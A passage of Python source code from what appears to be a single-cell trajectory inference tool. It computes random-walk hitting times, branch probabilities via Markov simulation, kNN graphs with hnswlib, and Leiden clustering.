if removed_terminal_i == False: terminal_clusters.remove(terminal_i)
print('TS', terminal_i, 'had 3 or more neighboring terminal states')
print('terminal_clusters', terminal_clusters)
return terminal_clusters
def compute_hitting_time(self, sparse_graph, root, x_lazy, alpha_teleport, number_eig=0):
# 1- alpha is the probabilty of teleporting
# 1- x_lazy is the probability of staying in current state (be lazy)
beta_teleport = 2 * (1 - alpha_teleport) / (2 - alpha_teleport)
N = sparse_graph.shape[0]
# print('adjacency in compute hitting', sparse_graph)
# sparse_graph = scipy.sparse.csr_matrix(sparse_graph)
print('start compute hitting')
A = scipy.sparse.csr_matrix.todense(sparse_graph) # A is the adjacency matrix
print('is graph symmetric', (A.transpose() == A).all())
lap = csgraph.laplacian(sparse_graph,
normed=False) # compute regular laplacian (normed = False) to infer the degree matrix where D = L+A
# see example and definition in the SciPy ref https://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.csgraph.laplacian.html
A = scipy.sparse.csr_matrix.todense(lap)
print('is laplacian symmetric', (A.transpose() == A).all())
deg = sparse_graph + lap # Recall that L=D-A (modified for weighted where D_ii is sum of edge weights and A_ij is the weight of particular edge)
deg.data = 1 / np.sqrt(deg.data) ##inv sqrt of degree matrix
deg[deg == np.inf] = 0
norm_lap = csgraph.laplacian(sparse_graph, normed=True) # returns symmetric normalized D^-.5 xL x D^-.5
Id = np.zeros((N, N), float)
np.fill_diagonal(Id, 1)
norm_lap = scipy.sparse.csr_matrix.todense(norm_lap)
eig_val, eig_vec = np.linalg.eig(
norm_lap) # eig_vec[:,i] is eigenvector for eigenvalue eig_val[i] not eigh as this is only for symmetric. the eig vecs are not in decsending order
# print('eig val', eig_val.shape, eig_val)
if number_eig == 0: number_eig = eig_vec.shape[1]
# print('number of eig vec', number_eig)
Greens_matrix = np.zeros((N, N), float)
beta_norm_lap = np.zeros((N, N), float)
Xu = np.zeros((N, N))
Xu[:, root] = 1
Id_Xv = np.zeros((N, N), int)
np.fill_diagonal(Id_Xv, 1)
Xv_Xu = Id_Xv - Xu
start_ = 0
if alpha_teleport == 1:
start_ = 1 # if there are no jumps (alph_teleport ==1), then the first term in beta-normalized Green's function will have 0 in denominator (first eigenvalue==0)
for i in range(start_, number_eig): # 0 instead of 1th eg
vec_i = eig_vec[:, i]
factor = beta_teleport + 2 * eig_val[i] * x_lazy * (1 - beta_teleport)
vec_i = np.reshape(vec_i, (-1, 1))
eigen_vec_mult = vec_i.dot(vec_i.T)
Greens_matrix = Greens_matrix + (
eigen_vec_mult / factor) # Greens function is the inverse of the beta-normalized laplacian
beta_norm_lap = beta_norm_lap + (eigen_vec_mult * factor) # beta-normalized laplacian
deg = scipy.sparse.csr_matrix.todense(deg)
temp = Greens_matrix.dot(deg)
temp = deg.dot(temp) * beta_teleport
hitting_matrix = np.zeros((N, N), float)
diag_row = np.diagonal(temp)
for i in range(N):
hitting_matrix[i, :] = diag_row - temp[i, :]
roundtrip_commute_matrix = hitting_matrix + hitting_matrix.T
temp = Xv_Xu.dot(temp)
final_hitting_times = np.diagonal(
temp) ## number_eig x 1 vector of hitting times from root (u) to number_eig of other nodes
roundtrip_times = roundtrip_commute_matrix[root, :]
return abs(final_hitting_times), roundtrip_times
def prob_reaching_terminal_state1(self, terminal_state, all_terminal_states, A, root, pt, num_sim,q,cumstateChangeHist, cumstateChangeHist_all,seed):
np.random.seed(seed)
n_states = A.shape[0]
n_components, labels = connected_components(csgraph=csr_matrix(A), directed=False)
A = A / (np.max(A))
# A[A<=0.05]=0
jj = 0
for row in A:
if np.all(row == 0): A[jj, jj] = 1
jj = jj + 1
P = A / A.sum(axis=1).reshape((n_states, 1))
# if P.shape[0]>16:
# print("P 16", P[:,16])
n_steps = int(2* n_states) # 2
currentState = root
state = np.zeros((1, n_states))
state[0, currentState] = 1
currentState = root
state = np.zeros((1, n_states))
state[0, currentState] = 1
state_root = state.copy()
neigh_terminal = np.where(A[:, terminal_state] > 0)[0]
non_nn_terminal_state = []
for ts_i in all_terminal_states:
if pt[ts_i] > pt[terminal_state]: non_nn_terminal_state.append(ts_i)
for ts_i in all_terminal_states:
if np.all(neigh_terminal != ts_i): non_nn_terminal_state.append(ts_i)
# print(ts_i, 'is a non-neighbor terminal state to the target terminal', terminal_state)
#cumstateChangeHist = np.zeros((1, n_states))
#cumstateChangeHist_all = np.zeros((1, n_states))
count_reach_terminal_state = 0
count_r = 0
for i in range(num_sim):
# distr_hist = [[0 for i in range(n_states)]]
stateChangeHist = np.zeros((n_states, n_states))
stateChangeHist[root, root] = 1
state = state_root
currentState = root
stateHist = state
terminal_state_found = False
non_neighbor_terminal_state_reached = False
# print('root', root)
# print('terminal state target', terminal_state)
x = 0
while (x < n_steps) & (
(terminal_state_found == False)): # & (non_neighbor_terminal_state_reached == False)):
currentRow = np.ma.masked_values((P[currentState]), 0.0)
nextState = simulate_multinomial(currentRow)
# print('next state', nextState)
if nextState == terminal_state:
terminal_state_found = True
count_r = count_r+1
# print('terminal state found at step', x)
# if nextState in non_nn_terminal_state:
# non_neighbor_terminal_state_reached = True
# Keep track of state changes
stateChangeHist[currentState, nextState] += 1
# Keep track of the state vector itself
state = np.zeros((1, n_states))
state[0, nextState] = 1.0
# Keep track of state history
stateHist = np.append(stateHist, state, axis=0)
currentState = nextState
x = x + 1
if (terminal_state_found == True):
cumstateChangeHist = cumstateChangeHist + np.any(
stateChangeHist > 0, axis=0)
count_reach_terminal_state = count_reach_terminal_state + 1
cumstateChangeHist_all = cumstateChangeHist_all + np.any(
stateChangeHist > 0, axis=0)
# avoid division by zero on states that were never reached (e.g. terminal states that come after the target terminal state)
cumstateChangeHist_all[cumstateChangeHist_all == 0] = 1
prob_ = cumstateChangeHist / cumstateChangeHist_all
np.set_printoptions(precision=3)
q.append([cumstateChangeHist, cumstateChangeHist_all])
def simulate_markov_sub(self, A, num_sim, hitting_array, q, root):
n_states = A.shape[0]
P = A / A.sum(axis=1).reshape((n_states, 1))
# hitting_array = np.ones((P.shape[0], 1)) * 1000
hitting_array_temp = np.zeros((P.shape[0], 1)).astype('float64')
n_steps = int(2 * n_states)
hitting_array_final = np.zeros((1, n_states))
currentState = root
print('root is', root)
state = np.zeros((1, n_states))
state[0, currentState] = 1
state_root = state.copy()
for i in range(num_sim):
dist_list = []
# print(i, 'th simulation in Markov')
# if i % 10 == 0: print(i, 'th simulation in Markov', time.ctime())
state = state_root
currentState = root
stateHist = state
for x in range(n_steps):
currentRow = np.ma.masked_values((P[currentState]), 0.0)
nextState = simulate_multinomial(currentRow)
dist = A[currentState, nextState]
dist = (1 / ((1 + math.exp((dist - 1)))))
dist_list.append(dist)
# print('next state', nextState)
# Keep track of state changes
# stateChangeHist[currentState,nextState]+=1
# Keep track of the state vector itself
state = np.zeros((1, n_states))
state[0, nextState] = 1.0
currentState = nextState
# Keep track of state history
stateHist = np.append(stateHist, state, axis=0)
for state_i in range(P.shape[0]):
# print('first reach state', state_i, 'at step', np.where(stateHist[:, state_i] == 1)[0][0])
first_time_at_statei = np.where(stateHist[:, state_i] == 1)[0]
if len(first_time_at_statei) == 0:
# print('did not reach state', state_i,'setting dummy path length')
hitting_array_temp[state_i, 0] = n_steps + 1
else:
total_dist = 0
for ff in range(first_time_at_statei[0]):
total_dist = dist_list[ff] + total_dist
hitting_array_temp[state_i, 0] = total_dist # first_time_at_statei[0]
# hitting_array_temp[hitting_array_temp==(n_steps+1)] = np.mean(hitting_array_temp[hitting_array_temp!=n_steps+1])
hitting_array = np.append(hitting_array, hitting_array_temp, axis=1)
# print('hitting temp', hitting_array_temp)
# if i % 100 == 0: print(i, 'th','has hitting temp', hitting_array_temp.flatten())
hitting_array = hitting_array[:, 1:]
q.append(hitting_array)
def simulate_branch_probability(self, terminal_state, all_terminal_states, A, root, pt, num_sim=300 ):
print('root', root)
print('terminal state target', terminal_state)
n_states = A.shape[0]
ncpu = multiprocessing.cpu_count()
if (ncpu == 1) | (ncpu == 2):
n_jobs = 1
elif ncpu > 2:
n_jobs = min(ncpu - 1, 5)
print('njobs', n_jobs)
num_sim_pp = int(num_sim / n_jobs) # num of simulations per process
print('num_sim_pp', num_sim_pp)
jobs = []
manager = multiprocessing.Manager()
q = manager.list()
seed_list = list(range(n_jobs))
for i in range(n_jobs):
cumstateChangeHist = np.zeros((1, n_states))
cumstateChangeHist_all = np.zeros((1, n_states))
process = multiprocessing.Process(target=self.prob_reaching_terminal_state1,args=(terminal_state, all_terminal_states, A, root, pt, num_sim_pp,q, cumstateChangeHist, cumstateChangeHist_all, seed_list[i]))
jobs.append(process)
for j in jobs:
j.start()
for j in jobs:
j.join()
cumhistory_vec = q[0][0]
cumhistory_vec_all = q[0][1]
count_reached= cumhistory_vec_all[0,terminal_state]
for i in range(1,len(q)):#[1,2,3,4]:
#for qi in q[1:]:
cumhistory_vec = cumhistory_vec + q[i][0]
cumhistory_vec_all = cumhistory_vec_all+ q[i][1]
#hitting_array = np.append(hitting_array, qi, axis=1) # .get(), axis=1)
count_reached = count_reached+ q[i][1][0,terminal_state]
print('accumulated number of times Terminal state',terminal_state, 'is found:',count_reached)
#print('cumhistory_vec', cumhistory_vec)
#print('cumhistory_vec_all', cumhistory_vec_all)
cumhistory_vec_all[cumhistory_vec_all == 0] = 1
prob_ = cumhistory_vec /cumhistory_vec_all
np.set_printoptions(precision=3)
#print('prob', prob_)
if count_reached == 0:
prob_[:, terminal_state] = 0
print('never reached state', terminal_state)
else:
loc_1 = np.where(prob_ == 1)
loc_1 = loc_1[1]
print('loc_1', loc_1)
# prob_[0, terminal_state] = 0 # starting at the root, index=0
prob_[0, loc_1] = 0
#print('zerod out prob', prob_)
temp_ = np.max(prob_)
if temp_ ==0: temp = 1
prob_ = prob_ / min(1,1.1 * temp_)
# prob_[0, terminal_state] = 1
prob_[0, loc_1] = 1
#prob_ = np.sqrt(prob_)
print('np.max', np.max(prob_))
#prob_ = prob_/np.max(prob_)
print('scaled prob', prob_)
return list(prob_)[0]
def simulate_markov(self, A, root):
n_states = A.shape[0]
P = A / A.sum(axis=1).reshape((n_states, 1))
# print('row normed P',P.shape, P, P.sum(axis=1))
x_lazy = self.x_lazy # 1-x is prob lazy
alpha_teleport = self.alpha_teleport
# bias_P is the transition probability matrix
# P = x_lazy * P + (1 - x_lazy) * np.identity(n_states)
# print(P, P.sum(axis=1))
# P = alpha_teleport * P + ((1 - alpha_teleport) * (1 / n_states) * (np.ones((n_states, n_states))))
# print('check prob of each row sum to one', P.sum(axis=1))
currentState = root
state = np.zeros((1, n_states))
state[0, currentState] = 1
state_root = state.copy()
stateHist = state
dfStateHist = pd.DataFrame(state)
distr_hist = np.zeros([1, n_states])
num_sim = 1300 # 1000 # 1300
ncpu = multiprocessing.cpu_count()
if (ncpu == 1) | (ncpu == 2):
n_jobs = 1
elif ncpu > 2:
n_jobs = min(ncpu - 1, 5)
print('njobs', n_jobs)
num_sim_pp = int(num_sim / n_jobs) # num of simulations per process
print('num_sim_pp', num_sim_pp)
n_steps = int(2 * n_states)
jobs = []
manager = multiprocessing.Manager()
q = manager.list()
for i in range(n_jobs):
hitting_array = np.ones((P.shape[0], 1)) * 1000
process = multiprocessing.Process(target=self.simulate_markov_sub,
args=(P, num_sim_pp, hitting_array, q, root))
jobs.append(process)
for j in jobs:
j.start()
for j in jobs:
j.join()
print('ended all multiprocesses, will retrieve and reshape')
hitting_array = q[0]
for qi in q[1:]:
hitting_array = np.append(hitting_array, qi, axis=1) # .get(), axis=1)
print('finished getting from queue', hitting_array.shape)
hitting_array_final = np.zeros((1, n_states))
no_times_state_reached_array = np.zeros((1, n_states))
for i in range(n_states):
rowtemp = hitting_array[i, :]
no_times_state_reached_array[0, i] = np.sum(rowtemp != (n_steps + 1))
lower_quart = np.percentile(no_times_state_reached_array, 25)
# loc_rarely_reached = np.where(no_times_state_reached_array<= upper_quart)
# print('rarely reached clus', loc_rarely_reached, upper_quart, no_times_state_reached_array)
for i in range(n_states):
rowtemp = hitting_array[i, :]
no_times_state_reached = np.sum(rowtemp != (n_steps + 1))
if no_times_state_reached != 0:
# print('the number of times state ',i, 'has been reached is', no_times_state_reached )
# if no_times_state_reached < lower_quart:
# perc = np.percentile(rowtemp[rowtemp != n_steps + 1], 5) + 0.001
# print('in lower quart for state', i)
perc = np.percentile(rowtemp[rowtemp != n_steps + 1], 15) + 0.001 # 15 for Human and Toy
# print('state ', i,' has perc' ,perc)
# print('smaller than perc', rowtemp[rowtemp <= perc])
# hitting_array_final[0, i] = np.min(rowtemp[rowtemp != (n_steps + 1)])
hitting_array_final[0, i] = np.mean(rowtemp[rowtemp <= perc])
else:
hitting_array_final[0, i] = (n_steps + 1)
# hitting_array=np.mean(hitting_array, axis=1)
print('hitting from sim markov', [(i, val) for i, val in enumerate(hitting_array_final.flatten())])
return hitting_array_final[0]
def compute_hitting_time_onbias(self, laplacian, inv_sqr_deg, root, x_lazy, alpha_teleport, number_eig=0):
# 1- alpha is the probabilty of teleporting
# 1- x_lazy is the probability of staying in current state (be lazy)
beta_teleport = 2 * (1 - alpha_teleport) / (2 - alpha_teleport)
N = laplacian.shape[0]
print('is laplacian of biased symmetric', (laplacian.transpose() == laplacian).all())
Id = np.zeros((N, N), float)
np.fill_diagonal(Id, 1)
# norm_lap = scipy.sparse.csr_matrix.todense(laplacian)
eig_val, eig_vec = np.linalg.eig(
laplacian) # eig_vec[:,i] is eigenvector for eigenvalue eig_val[i] not eigh as this is only for symmetric. the eig vecs are not in decsending order
print('eig val', eig_val.shape)
if number_eig == 0: number_eig = eig_vec.shape[1]
print('number of eig vec', number_eig)
Greens_matrix = np.zeros((N, N), float)
beta_norm_lap = np.zeros((N, N), float)
Xu = np.zeros((N, N))
Xu[:, root] = 1
Id_Xv = np.zeros((N, N), int)
np.fill_diagonal(Id_Xv, 1)
Xv_Xu = Id_Xv - Xu
start_ = 0
if alpha_teleport == 1:
start_ = 1 # if there are no jumps (alph_teleport ==1), then the first term in beta-normalized Green's function will have 0 in denominator (first eigenvalue==0)
for i in range(start_, number_eig): # 0 instead of 1th eg
# print(i, 'th eigenvalue is', eig_val[i])
vec_i = eig_vec[:, i]
factor = beta_teleport + 2 * eig_val[i] * x_lazy * (1 - beta_teleport)
# print('factor', 1 / factor)
vec_i = np.reshape(vec_i, (-1, 1))
eigen_vec_mult = vec_i.dot(vec_i.T)
Greens_matrix = Greens_matrix + (
eigen_vec_mult / factor) # Greens function is the inverse of the beta-normalized laplacian
beta_norm_lap = beta_norm_lap + (eigen_vec_mult * factor) # beta-normalized laplacian
temp = Greens_matrix.dot(inv_sqr_deg)
temp = inv_sqr_deg.dot(temp) * beta_teleport
hitting_matrix = np.zeros((N, N), float)
diag_row = np.diagonal(temp)
for i in range(N):
hitting_matrix[i, :] = diag_row - temp[i, :]
roundtrip_commute_matrix = hitting_matrix + hitting_matrix.T
temp = Xv_Xu.dot(temp)
final_hitting_times = np.diagonal(
temp) ## number_eig x 1 vector of hitting times from root (u) to number_eig of other nodes
roundtrip_times = roundtrip_commute_matrix[root, :]
return abs(final_hitting_times), roundtrip_times
def project_hittingtimes_sc(self, pt):
if self.data.shape[0] > 1000:
knn_sc = 10
else:
knn_sc = 10
neighbor_array, distance_array = self.knn_struct.knn_query(self.data, k=knn_sc)
print('shape of neighbor in project onto sc', neighbor_array.shape)
labels = np.asarray(self.labels)
sc_pt = np.zeros((len(self.labels),))
i = 0
for row in neighbor_array:
mean_weight = 0
# print('row in neighbor array of cells', row, labels.shape)
neighboring_clus = labels[row]
# print('neighbor clusters labels', neighboring_clus)
for clus_i in set(list(neighboring_clus)):
hitting_time_clus_i = pt[clus_i]
num_clus_i = np.sum(neighboring_clus == clus_i)
#if clus_i == self.root[0]: print('root is a neighbor', pt[clus_i], 'num NN cells beloning to root', num_clus_i)
# print('hitting and num_clus for Clusi', hitting_time_clus_i, num_clus_i)
mean_weight = mean_weight + hitting_time_clus_i * num_clus_i / knn_sc
# print('mean weight',mean_weight)
sc_pt[i] = mean_weight
#if self.root[0] in set(list(neighboring_clus)): print('the mean sc time for root neighbor is', mean_weight)
i = i + 1
return sc_pt
def project_branch_probability_sc(self, bp_array_clus, pt):
if self.data.shape[0] > 1000:
knn_sc = 10
else:
knn_sc = 10
neighbor_array, distance_array = self.knn_struct.knn_query(self.data, k=knn_sc)
print('shape of neighbor in project onto sc', neighbor_array.shape)
labels = np.asarray(self.labels)
n_clus = len(list(set(labels)))
weight_array = np.zeros((len(labels), n_clus))
for irow, row in enumerate(neighbor_array):
mean_weight = 0
#print('row in neighbor array of cells', row, labels.shape)
neighboring_clus = labels[row]
for clus_i in set(list(neighboring_clus)):
# hitting_time_clus_i = df_graph[clus_i]
num_clus_i = np.sum(neighboring_clus == clus_i)
# print('hitting and num_clus for Clusi', hitting_time_clus_i, num_clus_i)
wi = num_clus_i / knn_sc
weight_array[irow, clus_i] = wi
# print('mean weight',mean_weight)
#print('rowi of weight array', weight_array[irow,:])
#print('shape weight array', weight_array)
#print(weight_array)
bp_array_sc = weight_array.dot(bp_array_clus)
bp_array_sc = bp_array_sc * 1. / np.max(bp_array_sc, axis=0) #divide cell by max value in that column
#print('column max:',np.max(bp_array_sc, axis=0))
#print('sc bp array max', np.max(bp_array_sc))
#bp_array_sc = bp_array_sc/np.max(bp_array_sc)
for i, label_ts in enumerate(list(self.terminal_clusters)):
loc_i = np.where(np.asarray(self.labels) == label_ts)[0]
loc_noti = np.where(np.asarray(self.labels) != label_ts)[0]
if np.max(bp_array_sc[loc_noti,i])>0.8: bp_array_sc[loc_i,i]=1.2
pt = np.asarray(pt)
pt = np.reshape(pt, (n_clus,1))
pt_sc = weight_array.dot(pt)
self.single_cell_bp = bp_array_sc
self.single_cell_pt_markov = pt_sc.flatten()
return
def make_knn_struct(self, too_big=False, big_cluster=None, visual = False, data_visual = None):
if visual == False: data = self.data
else: data = data_visual
if self.knn > 190: print(colored('please provide a lower K_in for KNN graph construction','red'))
ef_query = max(100, self.knn + 1) # ef always should be >K. higher ef, more accuate query
if too_big == False:
num_dims = data.shape[1]
n_elements = data.shape[0]
p = hnswlib.Index(space=self.distance, dim=num_dims) # default to Euclidean distance
p.set_num_threads(self.num_threads) # allow user to set threads used in KNN construction
if n_elements < 10000:
ef_param_const = min(n_elements - 10, 500)
ef_query = ef_param_const
print('setting ef_construction to', )
else:
ef_param_const = 200
if (num_dims > 30) & (n_elements<=50000) :
p.init_index(max_elements=n_elements, ef_construction=ef_param_const,
M=48) ## good for scRNA seq where dimensionality is high
else:
p.init_index(max_elements=n_elements, ef_construction=ef_param_const, M=30 )
p.add_items(data)
if too_big == True:
num_dims = big_cluster.shape[1]
n_elements = big_cluster.shape[0]
p = hnswlib.Index(space='l2', dim=num_dims)
p.init_index(max_elements=n_elements, ef_construction=200, M=30)
p.add_items(big_cluster)
p.set_ef(ef_query) # ef should always be > k
return p
def make_csrmatrix_noselfloop(self, neighbor_array, distance_array, auto_ = True):
if auto_ == True:
local_pruning_bool = not (self.keep_all_local_dist)
if local_pruning_bool == True: print(colored('commencing local pruning based on l2 (squared) at','blue'),
colored(str(self.dist_std_local)+ 's.dev above mean','green'))
if auto_ ==False:local_pruning_bool = False
row_list = []
col_list = []
weight_list = []
neighbor_array = neighbor_array # not listed in in any order of proximity
# print('size neighbor array', neighbor_array.shape)
num_neigh = neighbor_array.shape[1]
distance_array = np.sqrt(distance_array)
n_neighbors = neighbor_array.shape[1]
n_cells = neighbor_array.shape[0]
rowi = 0
count_0dist = 0
discard_count = 0
if local_pruning_bool == True: # do some local pruning based on distance
for row in neighbor_array:
distlist = distance_array[rowi, :]
to_keep = np.where(distlist <= np.mean(distlist) + self.dist_std_local * np.std(distlist))[0] # 0*std
updated_nn_ind = row[np.ix_(to_keep)]
updated_nn_weights = distlist[np.ix_(to_keep)]
discard_count = discard_count + (num_neigh - len(to_keep))
for ik in range(len(updated_nn_ind)):
if rowi != row[ik]: # remove self-loops
row_list.append(rowi)
col_list.append(updated_nn_ind[ik])
dist = updated_nn_weights[ik]
if dist == 0:
count_0dist = count_0dist + 1
weight_list.append(dist)
rowi = rowi + 1
weight_list = np.asarray(weight_list)
weight_list = 1. /(weight_list +0.01)#0.05
if local_pruning_bool == False: # dont prune based on distance
row_list.extend(list(np.transpose(np.ones((n_neighbors, n_cells)) * range(0, n_cells)).flatten()))
col_list = neighbor_array.flatten().tolist()
#distance_array = np.sqrt(distance_array)
weight_list = (1. / (distance_array.flatten() + 0.01))
print('weight list ', np.percentile(np.asarray(weight_list), 5), np.percentile(np.asarray(weight_list),95))
# if local_pruning_bool == True: print('share of neighbors discarded in local distance pruning %.1f' % (discard_count / neighbor_array.size))
weight_list = weight_list *(np.mean(distance_array)**2)
print('mean distance array in make csr matrix', np.mean(distance_array))
weight_list = weight_list.tolist()
print('weight list ', np.percentile(np.asarray(weight_list), 5), np.percentile(np.asarray(weight_list), 95))
csr_graph = csr_matrix((np.array(weight_list), (np.array(row_list), np.array(col_list))),
shape=(n_cells, n_cells))
return csr_graph
def func_mode(self, ll):
# return MODE of list
# If multiple items are maximal, the function returns the first one encountered.
return max(set(ll), key=ll.count)
def run_toobig_subPARC(self, X_data, jac_std_toobig=1,
jac_weighted_edges=True):
n_elements = X_data.shape[0]
hnsw = self.make_knn_struct(too_big=True, big_cluster=X_data)
if self.knn >= 0.8 * n_elements:
k = int(0.5 * n_elements)
else:
k = self.knn
neighbor_array, distance_array = hnsw.knn_query(X_data, k=k)
# print('shapes of neigh and dist array', neighbor_array.shape, distance_array.shape)
csr_array = self.make_csrmatrix_noselfloop(neighbor_array, distance_array)
sources, targets = csr_array.nonzero()
mask = np.zeros(len(sources), dtype=bool)
mask |= (csr_array.data > (
np.mean(csr_array.data) + np.std(csr_array.data) * 5)) # smaller distance means stronger edge
# print('sum of mask', sum(mask))
csr_array.data[mask] = 0
csr_array.eliminate_zeros()
sources, targets = csr_array.nonzero()
edgelist = list(zip(sources.tolist(), targets.tolist()))
edgelist_copy = edgelist.copy()
G = ig.Graph(edgelist, edge_attrs={'weight': csr_array.data.tolist()})
sim_list = G.similarity_jaccard(pairs=edgelist_copy) # list of jaccard weights
new_edgelist = []
sim_list_array = np.asarray(sim_list)
if jac_std_toobig == 'median':
threshold = np.median(sim_list)
else:
threshold = np.mean(sim_list) - jac_std_toobig * np.std(sim_list)
strong_locs = np.where(sim_list_array > threshold)[0]
for ii in strong_locs: new_edgelist.append(edgelist_copy[ii])
sim_list_new = list(sim_list_array[strong_locs])
if jac_weighted_edges == True:
G_sim = ig.Graph(n=n_elements, edges=list(new_edgelist), edge_attrs={'weight': sim_list_new})
else:
G_sim = ig.Graph(n=n_elements, edges=list(new_edgelist))
G_sim.simplify(combine_edges='sum')
resolution_parameter = 1
if jac_weighted_edges == True:
partition = leidenalg.find_partition(G_sim, leidenalg.ModularityVertexPartition, weights='weight',
n_iterations=self.n_iter_leiden, seed=self.random_seed)
else:
partition = leidenalg.find_partition(G_sim, leidenalg.ModularityVertexPartition,
n_iterations=self.n_iter_leiden, seed=self.random_seed)
# print('Q= %.2f' % partition.quality())
PARC_labels_leiden = np.asarray(partition.membership)
PARC_labels_leiden = np.reshape(PARC_labels_leiden, (n_elements, 1))
small_pop_list = []
small_cluster_list = []
small_pop_exist = False
dummy, PARC_labels_leiden = np.unique(list(PARC_labels_leiden.flatten()), return_inverse=True)
for cluster in set(PARC_labels_leiden):
population = len(np.where(PARC_labels_leiden == cluster)[0])
if population < 5: # <10
small_pop_exist = True
small_pop_list.append(list(np.where(PARC_labels_leiden == cluster)[0]))
small_cluster_list.append(cluster)
for small_cluster in small_pop_list:
for single_cell in small_cluster:
old_neighbors = neighbor_array[single_cell, :]
group_of_old_neighbors = PARC_labels_leiden[old_neighbors]
group_of_old_neighbors = list(group_of_old_neighbors.flatten())
available_neighbours = set(group_of_old_neighbors) - set(small_cluster_list)
if len(available_neighbours) > 0:
available_neighbours_list = [value for value in group_of_old_neighbors if
value in list(available_neighbours)]
best_group = max(available_neighbours_list, key=available_neighbours_list.count)
PARC_labels_leiden[single_cell] = best_group
do_while_time = time.time()
while (small_pop_exist == True) & (time.time() - do_while_time < 5):
small_pop_list = []
small_pop_exist = False
for cluster in set(list(PARC_labels_leiden.flatten())):
population = len(np.where(PARC_labels_leiden == cluster)[0])
if population < 10:
small_pop_exist = True
# print(cluster, ' has small population of', population, )
small_pop_list.append(np.where(PARC_labels_leiden == cluster)[0])
for small_cluster in small_pop_list:
for single_cell in small_cluster:
old_neighbors = neighbor_array[single_cell, :]
group_of_old_neighbors = PARC_labels_leiden[old_neighbors]
group_of_old_neighbors = list(group_of_old_neighbors.flatten())
best_group = max(set(group_of_old_neighbors), key=group_of_old_neighbors.count)
PARC_labels_leiden[single_cell] = best_group
dummy, PARC_labels_leiden = np.unique(list(PARC_labels_leiden.flatten()), return_inverse=True)
self.labels = PARC_labels_leiden
return PARC_labels_leiden
def recompute_weights(self, clustergraph_ig, pop_list_raw):
sparse_clustergraph = get_sparse_from_igraph(clustergraph_ig, weight_attr='weight')
n = sparse_clustergraph.shape[0]
sources, targets = sparse_clustergraph.nonzero()
edgelist = list(zip(sources, targets))
weights = sparse_clustergraph.data
new_weights = []
i = 0
for s, t in edgelist:
pop_s = pop_list_raw[s]
pop_t = pop_list_raw[t]
w = weights[i]
nw = w * (pop_s + pop_t) / (pop_s * pop_t) # *
new_weights.append(nw)
i = i + 1
scale_factor = max(new_weights) - min(new_weights)
wmin = min(new_weights)
new_weights = [(wi + wmin) / scale_factor for wi in new_weights]
sparse_clustergraph = csr_matrix((np.array(new_weights), (sources, targets)),shape=(n, n))
sources, targets = sparse_clustergraph.nonzero()
edgelist = list(zip(sources, targets))
return sparse_clustergraph, edgelist
def find_root_HumanCD34(self, graph_dense, PARC_labels_leiden, root_idx, true_labels):
majority_truth_labels = np.empty((len(PARC_labels_leiden), 1), dtype=object)
graph_node_label = []
true_labels = np.asarray(true_labels)
deg_list = graph_dense.sum(axis=1).reshape((1, -1)).tolist()[0]
for ci, cluster_i in enumerate(sorted(list(set(PARC_labels_leiden)))):
cluster_i_loc = np.where(np.asarray(PARC_labels_leiden) == cluster_i)[0]
majority_truth = self.func_mode(list(true_labels[cluster_i_loc]))
majority_truth_labels[cluster_i_loc] = str(majority_truth) + 'c' + str(cluster_i)
graph_node_label.append(str(majority_truth) + 'c' + str(cluster_i))
root = PARC_labels_leiden[root_idx]
return graph_node_label, majority_truth_labels, deg_list, root
def find_root_bcell(self, graph_dense, PARC_labels_leiden, root_user, true_labels):
majority_truth_labels = np.empty((len(PARC_labels_leiden), 1), dtype=object)
graph_node_label = []
true_labels = np.asarray(true_labels)
deg_list = graph_dense.sum(axis=1).reshape((1, -1)).tolist()[0]
for ci, cluster_i in enumerate(sorted(list(set(PARC_labels_leiden)))):
# print('cluster i', cluster_i)
cluster_i_loc = np.where(np.asarray(PARC_labels_leiden) == cluster_i)[0]
majority_truth = self.func_mode(list(true_labels[cluster_i_loc]))
majority_truth_labels[cluster_i_loc] = str(majority_truth) + 'c' + str(cluster_i)
graph_node_label.append(str(majority_truth) + 'c' + str(cluster_i))
root = PARC_labels_leiden[root_user]
return graph_node_label, majority_truth_labels, deg_list, root
def find_root(self, graph_dense, PARC_labels_leiden, root_user, true_labels, super_cluster_labels_sub,
super_node_degree_list):
majority_truth_labels = np.empty((len(PARC_labels_leiden), 1), dtype=object)
graph_node_label = []
min_deg = 1000
super_min_deg = 1000
found_super_and_sub_root = False
found_any_root = False
true_labels = np.asarray(true_labels)
deg_list = graph_dense.sum(axis=1).reshape((1, -1)).tolist()[0]
print('deg list', deg_list) # locallytrimmed_g.degree()
for ci, cluster_i in enumerate(sorted(list(set(PARC_labels_leiden)))):
print('cluster i', cluster_i)
cluster_i_loc = np.where(np.asarray(PARC_labels_leiden) == cluster_i)[0]
majority_truth = str(self.func_mode(list(true_labels[cluster_i_loc])))
if self.super_cluster_labels != False:
super_majority_cluster = self.func_mode(list(np.asarray(super_cluster_labels_sub)[cluster_i_loc]))
super_majority_cluster_loc = np.where(np.asarray(super_cluster_labels_sub) == super_majority_cluster)[0]
super_majority_truth = self.func_mode(list(true_labels[super_majority_cluster_loc]))
super_node_degree = super_node_degree_list[super_majority_cluster]
if (str(root_user) in majority_truth) & (str(root_user) in str(super_majority_truth)):
if super_node_degree < super_min_deg:
found_super_and_sub_root = True
root = cluster_i
found_any_root = True
min_deg = deg_list[ci]
super_min_deg = super_node_degree
print('new root is', root, ' with degree', min_deg, 'and super node degree',
super_min_deg)
majority_truth_labels[cluster_i_loc] = str(majority_truth) + 'c' + str(cluster_i)
graph_node_label.append(str(majority_truth) + 'c' + str(cluster_i))
if (self.super_cluster_labels == False) | (found_super_and_sub_root == False):
print('self.super_cluster_labels', super_cluster_labels_sub, ' foundsuper_cluster_sub and super root',
found_super_and_sub_root)
for ic, cluster_i in enumerate(sorted(list(set(PARC_labels_leiden)))):
cluster_i_loc = np.where(np.asarray(PARC_labels_leiden) == cluster_i)[0]
print('cluster', cluster_i, 'set true labels', set(true_labels))
true_labels = np.asarray(true_labels)
majority_truth = str(self.func_mode(list(true_labels[cluster_i_loc])))
print('cluster', cluster_i, 'has majority', majority_truth, 'with degree list', deg_list)
if (str(root_user) in str(majority_truth)):
print('did not find a super and sub cluster with majority ', root_user)
if deg_list[ic] < min_deg:
root = cluster_i
found_any_root = True
min_deg = deg_list[ic]
print('new root is', root, ' with degree', min_deg)
# print('len graph node label', graph_node_label)
if found_any_root == False:
print('setting arbitrary root', cluster_i)
root = cluster_i
return graph_node_label, majority_truth_labels, deg_list, root
def full_graph_paths(self, X_data, n_components_original=1):
# make igraph object of very low-K KNN using the knn_struct PCA-dimension space made in PARC.
# This is later used by find_shortest_path for sc_bp visual
